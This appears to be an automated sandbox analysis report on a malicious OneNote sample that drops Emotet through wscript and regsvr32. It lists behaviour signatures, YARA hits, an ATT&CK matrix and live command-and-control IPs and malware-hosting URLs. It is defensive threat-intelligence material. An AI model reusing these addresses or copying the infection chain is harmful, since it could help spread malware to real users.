                    Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E9E8B push eax; retf 3_2_028E9E8E
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F7EAF push 458BCC5Ah; retf 3_2_028F7EBC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EA26E push ebp; ret 3_2_028EA26F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028FC731 push esi; iretd 3_2_028FC732
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E6C9F pushad ; ret 3_2_028E6CAA
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E6CDE push esi; iretd 3_2_028E6CDF
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F80D7 push ebp; retf 3_2_028F80D8
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EA0FC push ebp; iretd 3_2_028EA0FD
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F7987 push ebp; iretd 3_2_028F798F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028EA1D2 push ebp; iretd 3_2_028EA1D3
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F7D25 push 4D8BFFFFh; retf 3_2_028F7D2A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F7D3C push ebp; retf 3_2_028F7D3D
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F7D4E push ebp; iretd 3_2_028F7D4F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028F8157 push ebp; retf 3_2_028F8158
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_028E9D51 push ebp; retf 3_2_028E9D5A
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02537EAF push 458BCC5Ah; retf 4_2_02537EBC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0253C731 push esi; iretd 4_2_0253C732
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02526CDE push esi; iretd 4_2_02526CDF
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02526C9F pushad ; ret 4_2_02526CAA
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02537D4E push ebp; iretd 4_2_02537D4F
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02546D34 push edi; ret 4_2_02546D36
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02537D3C push ebp; retf 4_2_02537D3D
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02537D25 push 4D8BFFFFh; retf 4_2_02537D2A
                    Source: radC7DCA.tmp.dll.1.drStatic PE information: section name: _RDATA
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\JURwocL\wAXwf.dll (copy)Jump to dropped file
                    Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dllJump to dropped file
                    Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\JURwocL\wAXwf.dll (copy)Jump to dropped file
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\JURwocL\wAXwf.dll:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\regsvr32.exe TID: 4608Thread sleep time: -660000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeAPI coverage: 9.0 %
                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28
                    Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: wscript.exe, 00000001.00000003.387940812.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416390329.0000000005B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416607803.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410465872.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409677765.0000000005B81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409962664.0000000005B93000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410387535.0000000005B9B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.884919905.0000000000CF7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526872204.0000000000CF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: wscript.exe, 00000001.00000003.387940812.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416607803.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410465872.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
                    Source: regsvr32.exe, 00000004.00000002.884904534.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.468128599.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A878 GetProcessHeap,3_2_000000018000A878
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800082EC
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00000001800017DC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.65.88.10 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 213.239.212.5 443Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 186.194.240.217 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.207.28.33 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 103.43.75.120 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.235.8.30 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 72.15.201.15 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 206.189.28.199 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 107.170.39.149 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 82.223.21.224 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 149.56.131.28 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 169.57.156.166 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 1.234.2.232 8080Jump to behavior
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dllJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800070A0 cpuid 3_2_00000001800070A0
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_0000000180001D98

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Malicious OneNote
                    Source: Yara matchFile source: iMedPub_LTD_6.one, type: SAMPLE
                    Yara detected Emotet
                    Source: Yara matchFile source: 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 3.2.regsvr32.exe.1290000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.regsvr32.exe.c30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.regsvr32.exe.1290000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.884606012.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.382454189.0000000001290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.885272914.0000000002521000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected Malicious OneNote
                    Source: Yara matchFile source: iMedPub_LTD_6.one, type: SAMPLE

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Scripting                    		2
                    Registry Run Keys / Startup Folder                    		111
                    Process Injection                    		21
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		Exfiltration Over Other Network Medium11
                    Encrypted Channel                    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Virtualization/Sandbox Evasion                    		LSASS Memory121
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                    Non-Standard Port                    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)1
                    DLL Side-Loading                    		111
                    Process Injection                    		Security Account Manager1
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                    Ingress Tool Transfer                    		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                    Scripting                    		NTDS2
                    Process Discovery                    		Distributed Component Object ModelInput CaptureScheduled Transfer3
                    Non-Application Layer Protocol                    		SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Hidden Files and Directories                    		LSA Secrets1
                    Remote System Discovery                    		SSHKeyloggingData Transfer Size Limits114
                    Application Layer Protocol                    		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    Obfuscated Files or Information                    		Cached Domain Credentials2
                    File and Directory Discovery                    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Regsvr32                    		DCSync25
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828505 Sample: iMedPub_LTD_6.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 35 129.232.188.93 xneeloZA South Africa 2->35 37 185.4.135.165 TOPHOSTGR Greece 2->37 39 23 other IPs or domains 2->39 49 Snort IDS alert for network traffic 2->49 51 Multi AV Scanner detection for domain / URL 2->51 53 Antivirus detection for URL or domain 2->53 55 7 other signatures 2->55 10 ONENOTE.EXE 51 372 2->10         started        signatures3 process4 process5 12 wscript.exe 2 10->12         started        17 ONENOTEM.EXE 1 10->17         started        dnsIp6 47 penshorn.org 203.26.41.131, 443, 49696 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 12->47 31 C:\Users\user\AppData\...\radC7DCA.tmp.dll, PE32+ 12->31 dropped 33 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 12->33 dropped 61 System process connects to network (likely due to code injection or exploit) 12->61 19 regsvr32.exe 12->19         started        file7 signatures8 process9 process10 21 regsvr32.exe 2 19->21         started        file11 29 C:\Windows\System32\...\wAXwf.dll (copy), PE32+ 21->29 dropped 57 Hides that the sample has been downloaded from the Internet (zone.identifier) 21->57 25 regsvr32.exe 21->25         started        signatures12 process13 dnsIp14 41 45.235.8.30, 49735, 8080 WIKINETTELECOMUNICACOESBR Brazil 25->41 43 169.57.156.166, 8080 SOFTLAYERUS United States 25->43 45 21 other IPs or domains 25->45 59 System process connects to network (likely due to code injection or exploit) 25->59 signatures15

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    iMedPub_LTD_6.one31%ReversingLabsWin32.Trojan.OneNote
                    iMedPub_LTD_6.one41%VirustotalBrowse

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\radC7DCA.tmp.dll58%ReversingLabsWin64.Trojan.Emotet
                    C:\Windows\System32\JURwocL\wAXwf.dll (copy)58%ReversingLabsWin64.Trojan.Emotet

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    3.2.regsvr32.exe.1290000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                    4.2.regsvr32.exe.c30000.0.unpack100%AviraHEUR/AGEN.1215476Download File

                    Domains

                    SourceDetectionScannerLabelLink
                    penshorn.org11%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    https://cdn.entity.0%URL Reputationsafe
                    https://cdn.entity.0%URL Reputationsafe
                    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
                    https://api.aadrm.com/0%URL Reputationsafe
                    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
                    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
                    https://my.microsoftpersonalcontent.com0%URL Reputationsafe
                    https://store.office.cn/addinstemplate0%URL Reputationsafe
                    https://www.odwebp.svc.ms0%URL Reputationsafe
                    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
                    https://d.docs.live.net0%URL Reputationsafe
                    https://ncus.contentsync.0%URL Reputationsafe
                    https://wus2.contentsync.0%URL Reputationsafe
                    https://skyapi.live.net/Activity/0%URL Reputationsafe
                    https://api.cortana.ai0%URL Reputationsafe
                    https://staging.cortana.ai0%URL Reputationsafe
                    https://wus2.pagecontentsync.0%URL Reputationsafe
                    https://cortana.ai/api0%URL Reputationsafe
                    https://powerlift.acompli.net0%URL Reputationsafe
                    https://cortana.ai0%URL Reputationsafe
                    https://penshorn.org/0%Avira URL Cloudsafe
                    https://182.162.143.56/xqnhpb/100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/16%VirustotalBrowse
                    https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/21%VirustotalBrowse
                    https://penshorn.org/8%VirustotalBrowse
                    http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
                    https://91.207.28.33:8080/100%Avira URL Cloudmalware
                    https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                    https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
                    https://213.239.212.5/xqnhpb/l100%Avira URL Cloudmalware
                    https://159.89.202.34:443/xqnhpb/b/100%Avira URL Cloudmalware
                    https://213.239.212.5/xqnhpb/v100%Avira URL Cloudmalware
                    https://186.194.240.217/xqnhpb//100%Avira URL Cloudmalware
                    https://169.57.156.166:8080/xqnhpb/100%Avira URL Cloudmalware
                    https://107.170.39.149:8080/$100%Avira URL Cloudmalware
                    https://91.121.146.47:8080/xqnhpb/tG100%Avira URL Cloudmalware
                    https://91.121.146.47:8080/xqnhpb/Z100%Avira URL Cloudmalware
                    https://149.56.131.28:8080/100%Avira URL Cloudmalware
                    https://microsoftapc-my.sharepoint.com0%Avira URL Cloudsafe
                    https://213.239.212.5:443/xqnhpb/100%Avira URL Cloudmalware
                    https://45.235.8.30:8080/100%Avira URL Cloudmalware
                    https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
                    https://45.235.8.30:8080/xqnhpb/100%Avira URL Cloudmalware
                    https://82.223.21.224:8080/xqnhpb/100%Avira URL Cloudmalware
                    https://91.121.146.47:8080/xqnhpb/%%100%Avira URL Cloudmalware
                    http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
                    https://160.16.142.56:8080/0%Avira URL Cloudsafe
                    https://213.239.212.5///100%Avira URL Cloudmalware
                    https://penshorn.org:443/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                    https://45.235.8.30:8080/xqnhpb/b/4100%Avira URL Cloudmalware
                    https://103.43.75.120/P100%Avira URL Cloudmalware
                    http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
                    https://45.235.8.30:8080/xqnhpb//100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    penshorn.org
                    		203.26.41.131
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://182.162.143.56/xqnhpb/true
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://shell.suite.office.com:14430FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                      		high
                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                        		high
                        https://cdn.entity.0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                          		high
                          https://rpsticket.partnerservices.getmicrosoftkey.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://lookup.onenote.com/lookup/geolocation/v10FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                            		high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                              		high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                		high
                                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • 21%, Virustotal, Browse
                                • Avira URL Cloud: malware
                                		unknown
                                https://api.aadrm.com/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                  		high
                                  https://api.microsoftstream.com/api/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                      		high
                                      https://cr.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                        		high
                                        https://91.207.28.33:8080/regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 16%, Virustotal, Browse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://res.getmicrosoftkey.com/api/redemptionevents0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://tasks.office.com0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                          		high
                                          https://officeci.azurewebsites.net/api/0FA10290-6778-4D86-943C-754A19FE889E.0.drfalse
                                          • URL Reputation: safe
                                          		unknown
